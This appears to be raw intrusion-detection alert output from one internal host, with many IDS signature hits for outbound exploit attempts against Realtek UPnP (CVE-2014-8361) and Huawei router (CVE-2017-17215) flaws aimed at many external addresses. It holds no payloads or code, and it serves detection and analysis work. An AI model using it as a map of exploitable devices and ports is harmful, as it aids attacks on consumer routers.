                                      07/20/24-23:01:25.935242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614543652869192.168.2.2393.61.135.109
                                      07/20/24-23:02:00.056416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5506052869192.168.2.23171.38.97.128
                                      07/20/24-23:02:02.509837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3843652869192.168.2.23202.29.220.93
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644837215192.168.2.23197.5.78.7
                                      07/20/24-23:01:41.341391TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613784052869192.168.2.2335.242.111.156
                                      07/20/24-23:01:01.628217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613898252869192.168.2.23216.174.225.184
                                      07/20/24-23:01:44.837053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4999452869192.168.2.2327.31.121.159
                                      07/20/24-23:01:25.763318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4698652869192.168.2.23158.118.231.218
                                      07/20/24-23:02:00.868779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457452869192.168.2.23139.3.200.28
                                      07/20/24-23:01:51.879276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24845052869192.168.2.23105.221.97.172
                                      07/20/24-23:01:43.123752TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613799852869192.168.2.23200.2.226.98
                                      07/20/24-23:01:04.082384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862037215192.168.2.23197.41.17.240
                                      07/20/24-23:01:44.776719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901452869192.168.2.2397.80.44.168
                                      07/20/24-23:01:08.957638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24728852869192.168.2.2384.150.128.0
                                      07/20/24-23:01:27.668073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014437215192.168.2.23197.43.247.234
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955837215192.168.2.23157.215.201.153
                                      07/20/24-23:01:55.802130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615774252869192.168.2.2332.64.201.235
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.23197.5.169.228
                                      07/20/24-23:01:09.002255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5945052869192.168.2.235.1.90.206
                                      07/20/24-23:01:34.045144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830037215192.168.2.23197.102.42.235
                                      07/20/24-23:01:53.415663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673852869192.168.2.23100.28.35.63
                                      07/20/24-23:01:51.096458TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5946852869192.168.2.23163.50.116.249
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153437215192.168.2.23157.187.188.100
                                      07/20/24-23:01:25.796791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615728652869192.168.2.23103.96.50.123
                                      07/20/24-23:01:03.096471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4487052869192.168.2.23221.226.241.204
                                      07/20/24-23:01:27.654172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621237215192.168.2.23197.163.51.90
                                      07/20/24-23:01:44.439012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5012852869192.168.2.23112.170.166.3
                                      07/20/24-23:01:48.036012TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25136252869192.168.2.2388.132.0.162
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442637215192.168.2.23197.175.44.160
                                      07/20/24-23:01:48.498136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5322452869192.168.2.23171.236.184.127
                                      07/20/24-23:01:27.653028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322637215192.168.2.23157.147.20.129
                                      07/20/24-23:01:50.176893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4198052869192.168.2.2367.179.229.220
                                      07/20/24-23:01:53.432917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3876652869192.168.2.2374.243.121.184
                                      07/20/24-23:01:31.333872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198652869192.168.2.23103.227.74.238
                                      07/20/24-23:01:50.246033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697852869192.168.2.23130.119.229.116
                                      07/20/24-23:02:05.544188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4293652869192.168.2.23206.59.132.204
                                      07/20/24-23:01:02.287452TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615115052869192.168.2.23172.32.160.159
                                      07/20/24-23:01:45.261796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4915852869192.168.2.23102.31.132.7
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177437215192.168.2.23157.138.76.190
                                      07/20/24-23:02:04.721025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3895652869192.168.2.2314.187.245.173
                                      07/20/24-23:01:42.616434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23864852869192.168.2.2397.65.172.105
                                      07/20/24-23:01:31.978141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035837215192.168.2.23157.101.195.198
                                      07/20/24-23:01:47.915367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250652869192.168.2.23110.244.30.5
                                      07/20/24-23:01:24.943244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597837215192.168.2.2341.9.4.247
                                      07/20/24-23:01:42.485253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25887652869192.168.2.23162.227.232.27
                                      07/20/24-23:01:53.238230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3544052869192.168.2.23170.211.30.37
                                      07/20/24-23:01:42.943881TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25374252869192.168.2.23171.174.164.32
                                      07/20/24-23:01:43.170156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614023252869192.168.2.23126.252.220.138
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666837215192.168.2.2341.51.105.40
                                      07/20/24-23:01:42.527234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4888052869192.168.2.2371.169.30.84
                                      07/20/24-23:02:08.128674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5132252869192.168.2.23136.224.18.44
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793837215192.168.2.23157.210.25.215
                                      07/20/24-23:01:41.533243TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614486852869192.168.2.2378.42.251.42
                                      07/20/24-23:01:13.204741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207052869192.168.2.23100.41.144.113
                                      07/20/24-23:01:04.165954TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614515652869192.168.2.23120.98.109.98
                                      07/20/24-23:01:41.205247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615126852869192.168.2.238.226.239.105
                                      07/20/24-23:01:44.680845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4626852869192.168.2.23191.8.175.218
                                      07/20/24-23:01:42.962388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5957652869192.168.2.238.18.22.34
                                      07/20/24-23:01:46.319020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4437652869192.168.2.23161.25.16.6
                                      07/20/24-23:01:58.055687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613356652869192.168.2.23104.20.213.42
                                      07/20/24-23:01:58.249042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3321252869192.168.2.23163.245.29.116
                                      07/20/24-23:01:11.827498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251237215192.168.2.2392.168.171.93
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286637215192.168.2.23197.213.39.196
                                      07/20/24-23:01:02.113055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710037215192.168.2.23197.224.4.245
                                      07/20/24-23:02:06.806210TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24419852869192.168.2.23147.8.193.70
                                      07/20/24-23:01:42.411586TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25546852869192.168.2.23123.91.96.233
                                      07/20/24-23:01:46.891763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881452869192.168.2.235.252.81.48
                                      07/20/24-23:01:00.636534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067437215192.168.2.23157.114.148.67
                                      07/20/24-23:00:59.148145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624037215192.168.2.23157.231.240.156
                                      07/20/24-23:01:24.886284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.23157.51.148.163
                                      07/20/24-23:01:42.809185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5289252869192.168.2.23101.9.169.24
                                      07/20/24-23:01:13.583885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5832052869192.168.2.238.133.200.251
                                      07/20/24-23:01:23.872117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614605852869192.168.2.23211.69.194.148
                                      07/20/24-23:01:42.187124TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614910052869192.168.2.231.84.241.246
                                      07/20/24-23:01:04.631848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5900652869192.168.2.23147.69.83.159
                                      07/20/24-23:01:02.731126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615604052869192.168.2.2362.90.39.173
                                      07/20/24-23:01:25.783904TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615539852869192.168.2.2397.247.179.245
                                      07/20/24-23:01:14.113390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061037215192.168.2.23140.142.252.32
                                      07/20/24-23:01:51.016561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4687052869192.168.2.2370.60.237.131
                                      07/20/24-23:01:52.678633TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613776052869192.168.2.2317.76.42.20
                                      07/20/24-23:01:00.658201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835437215192.168.2.23157.80.93.33
                                      07/20/24-23:01:41.349768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3445652869192.168.2.23165.21.55.96
                                      07/20/24-23:01:45.667238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3324052869192.168.2.2324.80.173.172
                                      07/20/24-23:01:57.434940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401252869192.168.2.2374.191.12.65
                                      07/20/24-23:01:53.258882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4837852869192.168.2.23118.179.102.207
                                      07/20/24-23:01:11.635828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141037215192.168.2.23138.191.112.237
                                      07/20/24-23:01:08.615260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4610052869192.168.2.23209.154.77.145
                                      07/20/24-23:01:53.372532TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25720852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:43.763925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832652869192.168.2.2352.121.181.216
                                      07/20/24-23:01:41.249014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3762252869192.168.2.23136.37.204.244
                                      07/20/24-23:01:47.141323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5131652869192.168.2.23139.92.32.15
                                      07/20/24-23:01:54.277122TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615542252869192.168.2.23203.184.58.202
                                      07/20/24-23:01:04.053604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749637215192.168.2.2365.192.188.21
                                      07/20/24-23:01:42.479337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614342052869192.168.2.23204.114.85.200
                                      07/20/24-23:01:42.151857TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614472252869192.168.2.23111.193.202.8
                                      07/20/24-23:01:51.076036TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25462452869192.168.2.23203.124.141.209
                                      07/20/24-23:01:20.597058TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24457852869192.168.2.2336.168.150.31
                                      07/20/24-23:01:31.314147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25859652869192.168.2.2336.69.228.71
                                      07/20/24-23:01:44.450410TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25566652869192.168.2.23210.201.123.76
                                      07/20/24-23:01:46.092258TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23421852869192.168.2.2336.12.14.153
                                      07/20/24-23:01:49.040108TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613523852869192.168.2.2345.208.1.181
                                      07/20/24-23:01:49.203134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819252869192.168.2.2377.112.72.60
                                      07/20/24-23:01:34.048618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880637215192.168.2.2380.40.99.121
                                      07/20/24-23:01:42.713313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4079852869192.168.2.2379.42.102.158
                                      07/20/24-23:02:02.671155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24312052869192.168.2.2335.30.208.203
                                      07/20/24-23:01:53.459445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25091452869192.168.2.2380.12.29.225
                                      07/20/24-23:01:46.525128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24582052869192.168.2.2382.187.47.45
                                      07/20/24-23:01:43.839288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987052869192.168.2.23184.170.174.78
                                      07/20/24-23:01:45.407049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23545052869192.168.2.2391.148.233.46
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109837215192.168.2.23156.104.182.219
                                      07/20/24-23:01:44.470424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3505852869192.168.2.23217.231.155.95
                                      07/20/24-23:01:46.348899TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5333852869192.168.2.23138.36.169.221
                                      07/20/24-23:01:44.137774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3714252869192.168.2.2391.203.103.36
                                      07/20/24-23:01:48.181097TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24460452869192.168.2.23101.122.117.242
                                      07/20/24-23:01:00.645186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.23197.36.116.167
                                      07/20/24-23:01:51.328797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353852869192.168.2.2386.212.150.4
                                      07/20/24-23:01:45.104633TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23770252869192.168.2.23223.250.7.213
                                      07/20/24-23:01:46.329269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5699652869192.168.2.23173.172.122.41
                                      07/20/24-23:01:56.845732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24618852869192.168.2.2379.6.78.78
                                      07/20/24-23:01:10.738721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5051252869192.168.2.2350.114.115.150
                                      07/20/24-23:01:45.179680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615391852869192.168.2.23118.151.178.3
                                      07/20/24-23:01:41.686830TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25634452869192.168.2.2393.148.210.215
                                      07/20/24-23:01:12.852602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125452869192.168.2.23217.106.167.57
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834437215192.168.2.23116.171.63.113
                                      07/20/24-23:01:25.595910TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4700252869192.168.2.2362.157.173.255
                                      07/20/24-23:02:01.645031TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23997652869192.168.2.23201.63.23.173
                                      07/20/24-23:01:25.035135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5760052869192.168.2.23184.170.117.213
                                      07/20/24-23:01:41.488676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714052869192.168.2.2370.133.231.223
                                      07/20/24-23:01:47.726021TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24115852869192.168.2.2320.63.97.204
                                      07/20/24-23:01:54.829737TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597052869192.168.2.2396.119.211.11
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098837215192.168.2.23197.212.28.22
                                      07/20/24-23:02:11.743968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3757252869192.168.2.23112.84.192.59
                                      07/20/24-23:02:08.090583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3361852869192.168.2.2390.243.218.95
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285437215192.168.2.23197.235.3.106
                                      07/20/24-23:01:08.646615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3294052869192.168.2.23147.69.83.159
                                      07/20/24-23:01:40.296076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763637215192.168.2.23157.83.137.181
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101637215192.168.2.23157.8.213.94
                                      07/20/24-23:01:31.314146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5993452869192.168.2.23174.51.233.233
                                      07/20/24-23:01:44.658614TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25966452869192.168.2.23143.69.193.236
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131037215192.168.2.23126.71.100.246
                                      07/20/24-23:01:43.224525TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24598052869192.168.2.23183.154.28.107
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.2341.102.199.133
                                      07/20/24-23:01:51.304967TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3493852869192.168.2.23122.69.178.214
                                      07/20/24-23:00:57.223015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.23182.102.31.222
                                      07/20/24-23:01:02.789203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4823252869192.168.2.2398.176.193.82
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.2341.140.127.150
                                      07/20/24-23:01:14.111381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549637215192.168.2.2341.138.103.205
                                      07/20/24-23:01:42.717611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320652869192.168.2.2369.239.30.22
                                      07/20/24-23:01:53.963505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614746852869192.168.2.23161.136.114.82
                                      07/20/24-23:01:47.912435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5543452869192.168.2.23130.200.160.126
                                      07/20/24-23:01:27.649885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431037215192.168.2.2341.51.57.163
                                      07/20/24-23:01:08.606848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23694852869192.168.2.23146.210.17.240
                                      07/20/24-23:01:42.434719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3449452869192.168.2.23200.70.243.196
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659037215192.168.2.23157.20.155.148
                                      07/20/24-23:01:43.066571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3893652869192.168.2.23207.203.170.191
                                      07/20/24-23:00:57.222279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733237215192.168.2.23197.146.199.163
                                      07/20/24-23:01:42.780168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613365252869192.168.2.23213.68.164.174
                                      07/20/24-23:01:11.636425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065237215192.168.2.23197.24.62.182
                                      07/20/24-23:01:45.075399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615544452869192.168.2.2331.139.123.246
                                      07/20/24-23:01:48.965786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4188852869192.168.2.23176.234.87.122
                                      07/20/24-23:01:44.825081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24994252869192.168.2.23108.225.154.233
                                      07/20/24-23:01:41.238000TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3846452869192.168.2.2385.239.208.54
                                      07/20/24-23:00:59.213564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064637215192.168.2.23198.189.132.142
                                      07/20/24-23:01:07.005155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944437215192.168.2.2341.187.195.110
                                      07/20/24-23:01:51.743446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287052869192.168.2.2335.152.212.38
                                      07/20/24-23:01:31.321188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5747652869192.168.2.23157.108.156.75
                                      07/20/24-23:01:41.467111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613726852869192.168.2.23102.134.118.47
                                      07/20/24-23:01:46.004063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4094252869192.168.2.2359.99.39.216
                                      07/20/24-23:01:57.392094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3688452869192.168.2.23158.188.68.37
                                      07/20/24-23:00:57.222090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135437215192.168.2.23197.93.123.78
                                      07/20/24-23:01:08.589759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23594852869192.168.2.2327.130.132.139
                                      07/20/24-23:01:10.585824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613725052869192.168.2.2382.106.122.253
                                      07/20/24-23:01:45.414030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3367252869192.168.2.2386.248.56.62
                                      07/20/24-23:01:47.805449TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26058652869192.168.2.2388.49.181.78
                                      07/20/24-23:02:14.779973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5412452869192.168.2.23108.55.210.200
                                      07/20/24-23:01:42.915641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5759452869192.168.2.2345.244.207.174
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494237215192.168.2.2341.197.205.28
